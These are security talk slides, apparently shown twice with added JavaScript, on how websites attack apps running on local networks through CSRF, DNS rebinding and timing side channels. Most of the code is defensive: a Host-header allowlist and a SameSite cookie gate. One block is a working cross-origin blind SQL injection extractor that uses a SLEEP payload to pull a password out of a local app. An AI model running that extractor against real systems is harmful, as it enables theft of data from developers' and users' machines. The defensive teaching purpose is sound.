"Running vulnerable code
in local networks"
|| "how to get pwned by any website"
The web is broken!
Insecure standards, protocols and plugins
● WebRTC
■ Leaks the real IP behind a VPN
■ Can scan the local network
● SVG
■ Not always blocked in picture uploads
■ Leads to stored XSS, various filter bypasses, could be used to bypass CSP nonces
● Flash
■ Unofficial competition between Flash and Firefox who gets most CVEs for code execution
■ Exploit kit coder's choice
SOP is too permissive
● Cross Site History Manipulation (XSHM)
● Load images and scripts from any domain
● Frame all the web sites
■ But X-Frame-Options?! Even a blocked frame still leaks page loading times
■ In some cases window.open() also does the job
● Does NOT prevent making requests, ONLY prevents reading the responses
● Cookies are sent by default
Are authenticated cross-origin requests necessary?
● Sending cookies when including remote images?
● Sending cookies when submitting forms to another website?
■ Necessary? Sometimes.
■ Should it be the default behaviour? Please no!
● Sending cookies with GET requests?
■ There's not really a way around it
■ Would annoy users
The Problem
● Users don't want to trade too much comfort for security
● It's up to developers to implement countermeasures for those shortcomings
■ CSRF tokens
■ SameSite cookies
■ Checks for the Origin header (WebSockets)
● Developers don't want to trade too much comfort for security
● SOP is the enemy, so they punch holes in it
■ crossdomain.xml
■ postMessage
■ CORS
■ JSONP
That's nothing new
● We know we should use strong passwords and 2FA
● We should implement every possible countermeasure for permissive SOP and other browser "features"
● We should not run insecure code in production
● We need to update our software
We all follow those guidelines
Except when we don't
well...
Let me explain
At what point do you consider your code as publicly accessible?
● While coding
● In your private repository
● In your testing environment
● In production ✔
Wait what?
● My web server binds to 127.0.0.1!
● Other servers used for testing are behind a firewall!
● I am the only one who has access to my code!
● Windows Defender is up and running, so I don't even know why I watch this presentation!11
You forget about your biggest attack surface: the browser
To hack your local application attackers can use
● CSRF
● DNS rebinding
● XSHM and similar attacks
● Timing side channels
Security guidelines
Now tell me again, at every stage of your web app development:
● Use strong passwords / 2FA / authentication?
■ Exploitable through DNS rebinding, XSHM, CSRF
● Protect against CSRF?
■ Exploitable through - well - CSRF
■ Also XSHM
■ Doesn't matter for DNS rebinding anyway if it's unauthenticated / passwords are guessable
● Only run secure code?
■ As hacker or security researcher? Get another job.
■ As a developer? I have some small doubts here
Hacking the dev? Why not the server?
● Developers are the more valuable target when
■ They have a copy of production data or access to backups
■ They have access to other internal systems
■ Production server is secured
■ Their private movie collection is big enough (Critical mass > 500 GB)
■ There might be multiple sites the developer is responsible for
■ The application is announced but not online yet (startups, new features in existing sites)
■ There's a higher chance * to find buggy code in a development environment
● * Except if you develop the Facebook Messenger for Android, chances should be equal then
But I'm not a developer
Good point. No testing environment, no vulnerable applications, right?
● Applications that run web apps on your computer
■ Management interfaces
■ WebSockets to exchange data between a website and a local client
● Other devices in your network
■ Your internet connected fidget spinner (or whatever monstrosity Kickstarter creates next)
■ NAS management interface
● One web interface almost every consumer has in the network
■ Vulnerable home router
DEMO TIME
Well, this is bad
"That was a lucky guess with the default password. And stuff like an SQL injection can't be abused just with CSRF while you are cross-domain."
● Completely right
■ You can't read the response of a request
■ You can't add data if it's a SELECT query
■ OOB exfiltration is not possible without proper privileges
■ Conclusion: My data is safe!
WRONG
● Oh come on, this is starting to get annoying
● Just because it is annoying. If you assume anything regarding SOP it's most likely wrong
● What's the matter now? How can an attacker possibly abuse an SQL injection through the victim's browser even though there's SOP in place?
We've talked about them before: iframes!
Iframes can be used to extract data from an SQL injection
● Well, not only iframes, but also <img>, XHR and even the WebSocket API
● The problem? Leaking page loading times
● So what?
● SQL injection + delayed page loading time (a time-based payload) = ?
● Right. We can abuse blind SQL injections cross-domain!
● Seems like it's...
DEMO TIME
Well, this is bad too
But what are the alternatives?
● Running your code in a VM
■ Separation, but not that practical
■ Can still lead to compromise of the host machine or other machines in the network
■ Code can be modified
● Don't visit the internet while you code
■ Your code might require an active internet connection
Is there any way to be safe?
DNS Rebinding
● Side effect: the browser keeps sending the attacker's domain in the Host header, so the rebound request arrives with a Host value your server never expected
■ Shared hosting not vulnerable (an unknown Host only reaches the default vhost)
■ We can whitelist the original Host header
● Is it preventable?
■ Yes. Either on application or server level (preferred).
■ If the Host header doesn't match a whitelisted value -> 403.
■ Works for Apache, IIS, nginx
Is there any way to be safe?
CSRF
● Problem:
■ There might be no authentication yet, so critical functions might be exposed for everyone
■ No CSRF protection added yet
■ You audit vulnerable code without CSRF protection at all
● There is not an easy solution for this
■ Using frameworks
■ Starting with CSRF protection and authentication
MEH
Is there any way to be safe?
(Experimental) Universal CSRF protection in your environment? Conveniently possible for PHP apps
● First: Create a file with the following content:
Is there any way to be safe?
Halfway done
● Next: Add the file to the php.ini directive auto_prepend_file
■ This will automatically include the file whenever any PHP file is parsed. This works in a similar fashion as PHP's require().
● This means, whenever a web page is opened it will
■ Load the PHP file
■ Check if a cookie with the name "access" is set
■ If it's not, it will just throw an error, set the cookie and stop execution
■ If it is, the file does nothing and doesn't interfere with your code
● Since it's a SameSite cookie, the browser only attaches it to same-site requests; a cross-site request never carries it and is stopped before your code runs
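The two server-side checks from the last slides (the Host whitelist against DNS rebinding and the universal "access" cookie gate against CSRF) as one added example. This is not the slides' PHP file, which is not reproduced on this page, and not code by the presentation's author; it is the same logic written as a JavaScript request gate with the (req, res) shape of a Node.js http.createServer handler. Everything concrete is an assumption: the dev server is reached as 127.0.0.1:8080 or localhost:8080, the marker cookie is called "access", and the requests at the bottom are constructed, not captured.

```javascript
// Added example (not from the slides): the two server-side checks the deck
// recommends for a locally running web app, written as a request gate with
// the same (req, res) shape as a Node.js http.createServer handler. The
// slides describe the CSRF part as a PHP auto_prepend_file; this is the same
// logic in JavaScript. Assumptions (hypothetical): the dev server is reached
// as 127.0.0.1:8080 or localhost:8080, and the marker cookie is called "access".

const ALLOWED_HOSTS = new Set(['127.0.0.1:8080', 'localhost:8080']);
const ACCESS_COOKIE = 'access';

// Check 1, DNS rebinding. After attacker.example is rebound to 127.0.0.1 the
// browser still sends "Host: attacker.example", because from its point of
// view nothing changed. Our own server is only ever addressed by the names
// in the allowlist, so anything else is rejected before the app runs.
function hostAllowed(hostHeader) {
  return typeof hostHeader === 'string' && ALLOWED_HOSTS.has(hostHeader.trim().toLowerCase());
}

// Minimal parser for the Cookie request header: "a=1; b=2".
function parseCookies(cookieHeader) {
  const cookies = {};
  for (const part of (cookieHeader || '').split(';')) {
    const eq = part.indexOf('=');
    if (eq > 0) cookies[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return cookies;
}

// Check 2, universal CSRF gate. The first same-site visit gets the marker
// cookie and an error; every later same-site request carries it and passes.
// SameSite=Strict means the browser never attaches it to a request that
// originates from another site, so a CSRF form/img/fetch from attacker.example
// arrives without it and is stopped here, whatever the app behind it does.
function accessGate(cookieHeader) {
  if (parseCookies(cookieHeader)[ACCESS_COOKIE] === '1') return { allowed: true };
  return {
    allowed: false,
    setCookie: `${ACCESS_COOKIE}=1; Path=/; HttpOnly; SameSite=Strict`,
  };
}

// The gate itself. `next` is the real application handler; it only runs when
// both checks pass. Returns the status code that was sent.
function gate(req, res, next) {
  if (!hostAllowed(req.headers.host)) {
    res.statusCode = 403;
    res.end('Forbidden: unexpected Host header');
    return 403;
  }
  const access = accessGate(req.headers.cookie);
  if (!access.allowed) {
    res.statusCode = 403;
    res.setHeader('Set-Cookie', access.setCookie);
    res.end('Forbidden: access cookie set, reload the page');
    return 403;
  }
  return next(req, res);
}

// Drive the gate with constructed requests (no network, no real server).
function simulate(headers) {
  const res = {
    statusCode: 200,
    headers: {},
    setHeader(name, value) { this.headers[name] = value; },
    end() {},
  };
  const app = (req, r) => { r.statusCode = 200; r.end('app output'); return 200; };
  const status = gate({ headers }, res, app);
  return { status, setCookie: res.headers['Set-Cookie'] || null };
}

// Stand-alone demo of the three situations that matter.
console.log('rebound host :', simulate({ host: 'attacker.example', cookie: 'access=1' }).status); // 403
console.log('first visit  :', simulate({ host: '127.0.0.1:8080' }));                              // 403 + Set-Cookie
console.log('second visit :', simulate({ host: '127.0.0.1:8080', cookie: 'access=1' }).status);  // 200
```

To use it for real, wrap the app as `http.createServer((req, res) => gate(req, res, app))`. The order of the checks matters: the cookie gate on its own does not stop DNS rebinding, because the attacker's origin simply collects its own "access" cookie with the first request and sends it with the second (that request is same-site from attacker.example's point of view), which is why the Host check runs first. The web-server-level equivalent the slide prefers is a catch-all virtual host, for example in nginx a `server { listen 8080 default_server; server_name _; return 403; }` block, so only the named vhost ever reaches the application. The SameSite=Strict cookie also blocks legitimate cross-site links into the dev app until the page is reloaded once, which is the price the slide labels "experimental".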
Conclusion
Don't rely on SOP doing the right thing
● Everything we talked about is preventable, countermeasures are just not always well known
● Developers and security researchers should keep in mind that their testing environments are publicly accessible to a certain degree
● Even the average user is at risk. Passwords for routers should be strong and unique like every other password
● SOP alone is not going to save you

Hacking Vulnerable Websites to Bypass Firewalls

  • 7. We all follow those guidelines
Except when we don't
well...
  • 8. Let me explain
At what point do you consider your code to be publicly accessible?
● While coding
● In your private repository
● In your testing environment
● In production
  • 9. Wait what?
● My web server binds to 127.0.0.1!
● Other servers used for testing are behind a firewall!
● I am the only one who has access to my code!
● Windows Defender is up and running, so I don't even know why I am watching this presentation!11
  • 10. You forget about your biggest attack surface: your own browser
To hack your local application, attackers can use
● CSRF
● DNS rebinding
● XSHM and similar attacks
● Timing side channels
  • 11. Security guidelines
Now tell me again, at every stage of your web app development:
● Use strong passwords / 2FA / authentication?
  ■ If not: exploitable through DNS rebinding, XSHM, CSRF
● Protect against CSRF?
  ■ If not: exploitable through, well, CSRF
  ■ Also XSHM
  ■ CSRF protection doesn't matter against DNS rebinding anyway if the app is unauthenticated or the password is guessable (the rebound page is same-origin and can read the token)
● Only run secure code?
  ■ As a hacker or security researcher? Get another job.
  ■ As a developer? I have some small doubts here.
  • 12. Hacking the dev? Why not the server?
Developers are the more valuable target when
● They have a copy of production data or access to backups
● They have access to other internal systems
● The production server is secured
● Their private movie collection is big enough (critical mass > 500 GB)
● There might be multiple sites the developer is responsible for
● The application is announced but not online yet (startups, new features in existing sites)
● There's a higher chance* to find buggy code in a development environment
* Except if you develop the Facebook Messenger for Android; chances should be equal then
  • 13. But I'm not a developer
Good point. No testing environment, no vulnerable applications, right?
● Applications that run web apps on your computer
  ■ Management interfaces
  ■ WebSockets used to exchange data between a website and a local client
● Other devices in your network
  ■ Your internet-connected fidget spinner (or whatever monstrosity Kickstarter creates next)
  ■ NAS management interface
● One web interface almost every consumer has in the network
  ■ Vulnerable home router
  • 15. Well, this is bad
"That was a lucky guess with the default password. And stuff like an SQL injection can't be abused just with CSRF while you are cross-domain."
● Completely right:
  ■ You can't read the response of a request
  ■ You can't add data if it's a SELECT query
  ■ OOB exfiltration is not possible without proper privileges
  ■ Conclusion: my data is safe! WRONG
● Oh come on, this is starting to get annoying
● Just because it is annoying: if you assume anything regarding SOP, it's most likely wrong
● What's the matter now? How can an attacker possibly abuse an SQL injection through the victim's browser even though there's SOP in place?
  • 16. We've talked about them before: iframes!
Iframes can be used to extract data from an SQL injection
● Well, not only iframes, but also <img>, XHR and even the WebSocket API
● The problem? Leaking page loading times: the attacker cannot read the response, but can measure when the request completes (onload/onerror fires)
● So what?
● SQL injection + delayed page loading time = ?
● Right. We can abuse blind SQL injections cross-domain!
● Seems like it's...
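To make the timing channel concrete, here is an added example of what an attacker's page can do with it; this is my code, not from the slides. A time-based blind SQL injection in a hypothetical local app at http://127.0.0.1:8080/item?id=... is driven from a cross-origin page that never reads a response: it only measures how long an <img> takes to fail. The endpoint, the `users`/`password` schema and the MySQL SLEEP() payload are assumptions, and the simulated target at the end is a constructed stand-in for the real server so the extraction logic can run offline.

```javascript
// Added example: extracting data from a blind SQL injection across origins
// by timing. SOP stops the attacker's page from reading the response of a
// request to the victim's local app, but it does not stop the request from
// being sent, and the page can observe when the <img> fires onload/onerror.
// A query that sleeps only when a condition is true turns that into a 1-bit
// oracle, and a binary search turns the oracle into bytes.

// Hypothetical vulnerable endpoint on the developer's machine (assumption).
const TARGET = 'http://127.0.0.1:8080/item?id=';
const SLEEP_SECONDS = 2;                          // delay requested from the DB
const THRESHOLD_MS = SLEEP_SECONDS * 1000 * 0.75; // well above normal latency

// Injected condition (MySQL syntax, assumed schema): "is character `pos` of
// the secret greater than `guess`?" When true the DB sleeps, otherwise not.
function buildPayload(pos, guess) {
  return `1 AND IF(ORD(SUBSTRING((SELECT password FROM users LIMIT 1),${pos},1))>${guess},` +
         `SLEEP(${SLEEP_SECONDS}),0)`;
}

// Browser-side probe: send the payload cross-origin through an <img> and
// measure how long the browser takes to give up on it. The response body is
// never read, so SOP has nothing to block. (Only runs in a browser.)
function imageTimingProbe(payload) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = TARGET + encodeURIComponent(payload);
  });
}

// Binary search over printable ASCII using the timing oracle: about seven
// probes per character instead of up to 95.
async function extractChar(probe, pos) {
  let lo = 32, hi = 126;
  while (lo < hi) {
    const mid = Math.floor((lo + hi) / 2);
    const elapsedMs = await probe(buildPayload(pos, mid));
    if (elapsedMs >= THRESHOLD_MS) lo = mid + 1; // slept => char > mid
    else hi = mid;                               // no sleep => char <= mid
  }
  return String.fromCharCode(lo);
}

async function extractSecret(probe, length) {
  let out = '';
  for (let pos = 1; pos <= length; pos++) out += await extractChar(probe, pos);
  return out;
}

// Constructed stand-in for the vulnerable target so the example runs offline:
// it evaluates the injected condition against a known secret and returns the
// delay a real server would have shown, without actually sleeping.
function simulatedTargetProbe(secret) {
  const jitter = () => 40 + Math.random() * 30;  // ordinary round-trip noise
  return async (payload) => {
    const m = /,(\d+),1\)\)>(\d+),SLEEP\((\d+)\)/.exec(payload);
    const [pos, guess, sleep] = m.slice(1).map(Number);
    const conditionTrue = secret.charCodeAt(pos - 1) > guess;
    return conditionTrue ? sleep * 1000 + jitter() : jitter();
  };
}

// Usage against the simulated target (a real attack would pass
// imageTimingProbe instead and run inside the victim's browser):
extractSecret(simulatedTargetProbe('s3cret!'), 7).then((s) => console.log(s));
```

The same loop works with an iframe or a WebSocket as the probe; only the way the completion time is observed changes. Against a real target the threshold has to be calibrated and noisy probes repeated, and the browser's per-host connection limit caps how many probes can run in parallel, but none of that requires reading a single byte of the response.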
  • 18. Well, this is bad too
But what are the alternatives?
● Running your code in a VM
  ■ Separation, but not that practical
  ■ Can still lead to compromise of the host machine or other machines in the network
  ■ Code can be modified
● Don't visit the internet while you code
  ■ Your code might require an active internet connection
  • 19. Is there any way to be safe? DNS Rebinding
● Side effect: a new Host header
  ■ After the rebind the browser still sends the attacker's domain in the Host header, so on shared hosting only the default host is vulnerable (name-based virtual hosts won't match)
  ■ We can whitelist the original host header
● Is it preventable?
  ■ Yes. Either on application or server level (preferred).
  ■ If the Host header doesn't match a whitelisted value -> 403.
  ■ Works for Apache, IIS, nginx
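The application-level variant of that check, as an added example (my code, not from the slides), written as Node/Express-style middleware: the allowlist of hostnames is an assumption for a dev box, and the only thing the guard looks at is the Host header, which after a rebind still carries the attacker's domain.

```javascript
// Added example: application-level Host header allowlist against DNS
// rebinding. After a rebind the attacker's page talks to 127.0.0.1, but the
// browser still puts the attacker's domain in the Host header, because that
// is the name the page used. Rejecting any Host that is not one of ours
// stops the request before the application sees it.

// Names under which we legitimately reach the dev server (assumed list).
const ALLOWED_HOSTS = ['localhost', '127.0.0.1', '[::1]', 'myapp.test'];

// Normalise a Host header: lower-case, strip the port (keeping IPv6
// brackets intact), reject anything empty or malformed.
function hostnameOf(hostHeader) {
  if (typeof hostHeader !== 'string' || hostHeader.length === 0) return null;
  const h = hostHeader.trim().toLowerCase();
  if (h.startsWith('[')) {                 // [::1]:8080 -> [::1]
    const end = h.indexOf(']');
    return end === -1 ? null : h.slice(0, end + 1);
  }
  const host = h.split(':')[0];            // localhost:8080 -> localhost
  return /^[a-z0-9.-]+$/.test(host) ? host : null;
}

function isAllowedHost(hostHeader, allowed = ALLOWED_HOSTS) {
  const name = hostnameOf(hostHeader);
  return name !== null && allowed.includes(name);
}

// Middleware for a Node http/Express-style server: 403 and stop if the Host
// is not ours; otherwise hand over to the application. Returns true when the
// request was passed on, false when it was rejected.
function hostGuard(allowed = ALLOWED_HOSTS) {
  return (req, res, next) => {
    if (!isAllowedHost(req.headers.host, allowed)) {
      res.writeHead(403, { 'Content-Type': 'text/plain' });
      res.end('Forbidden: unexpected Host header\n');
      return false;
    }
    if (typeof next === 'function') next();
    return true;
  };
}
```

Mount it before anything else in the app so it runs even for routes that don't exist yet. The server-level form the slide prefers is the same rule one layer down: a catch-all default virtual host that answers every unknown Host with an error (in nginx a `listen 80 default_server;` block with `return 444;`), so only explicitly named hosts reach the application. Note what this does not do: a cross-site page can still make the browser send requests straight to http://127.0.0.1:8080/, and those arrive with a perfectly valid Host header, so CSRF has to be handled separately.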
  • 20. Is there any way to be safe? CSRF
● Problem:
  ■ There might be no authentication yet
  ■ Critical functions might be exposed to everyone
  ■ No CSRF protection added yet
  ■ You audit vulnerable code without CSRF protection at all
● There is no easy solution for this
  ■ Using frameworks
  ■ Starting with CSRF protection and authentication
  ■ MEH
  • 21. Is there any way to be safe? (Experimental)
Universal CSRF protection in your environment? Conveniently possible for PHP apps
● First: create a file with the following content:
  • 22. Is there any way to be safe? Halfway done
● Next: add the file to the php.ini directive auto_prepend_file
● This automatically includes the file whenever any PHP file is parsed, in a similar fashion to PHP's require()
● This means that whenever a web page is opened it will
  ■ Load the PHP file
  ■ Check if a cookie with the name "access" is set
  ■ If it's not, it will just throw an error, set the cookie and stop execution
  ■ If it is, the file does nothing and doesn't interfere with your code
● Since it's a SameSite cookie, the browser only attaches it to requests that originate from the same site, so cross-site requests arrive without it and are stopped before your code runs
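The slides describe what the prepended file does; as an added example (my own re-implementation, not the author's PHP file), here is the same gate as Node/Express-style middleware so the mechanism can be read and exercised. The cookie name `access` is from the slides; SameSite=Strict, the HttpOnly flag and the 403 response are my choices.

```javascript
// Added example: the "universal CSRF gate" from the slides, re-implemented
// as Node/Express-style middleware instead of a PHP auto_prepend_file.
// Idea: a SameSite cookie is only attached to requests that originate from
// our own site. A request without it is either the very first visit or a
// cross-site request; in both cases refuse, set the cookie and stop. The
// cookie value is not a secret: the browser's SameSite enforcement is the
// control, not the value.

const GATE_COOKIE = 'access';                                            // name from the slides
const SET_COOKIE = `${GATE_COOKIE}=1; Path=/; HttpOnly; SameSite=Strict`; // Strict: my choice

// Minimal Cookie header parser: "a=1; b=2" -> { a: '1', b: '2' }.
function parseCookies(header) {
  const out = {};
  if (typeof header !== 'string') return out;
  for (const part of header.split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    const name = part.slice(0, eq).trim();
    if (name) out[name] = part.slice(eq + 1).trim();
  }
  return out;
}

function hasGateCookie(cookieHeader) {
  return Object.prototype.hasOwnProperty.call(parseCookies(cookieHeader), GATE_COOKIE);
}

// Middleware: returns true when the request may proceed, false when it was
// answered with 403 and the gate cookie was (re)issued.
function csrfGate() {
  return (req, res, next) => {
    if (!hasGateCookie(req.headers.cookie)) {
      res.writeHead(403, { 'Set-Cookie': SET_COOKIE, 'Content-Type': 'text/plain' });
      res.end('Access cookie missing: reload to continue (cross-site requests are refused)\n');
      return false;
    }
    if (typeof next === 'function') next();
    return true;
  };
}
```

Caveats a practitioner should keep in mind before trusting this gate: use SameSite=Strict, because Lax still attaches the cookie to top-level GET navigations, so a link to a GET endpoint with side effects would get through. "Same site" is wider than "same origin": another app on localhost on a different port, or any subdomain of the same registrable domain, is same-site and can still make requests that carry the cookie. It does nothing against DNS rebinding, since after a rebind the attacker's origin is the first party: the first request gets the cookie set and the second one passes, which is why the Host header allowlist from slide 19 is needed as well. And a browser that does not implement SameSite sends the cookie cross-site like any other.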
  • 23. Conclusion
Don't rely on SOP doing the right thing
● Everything we talked about is preventable; the countermeasures are just not always well known
● Developers and security researchers should keep in mind that their testing environments are publicly accessible to a certain degree
● Even the average user is at risk. Passwords for routers should be strong and unique, like every other password
● SOP alone is not going to save you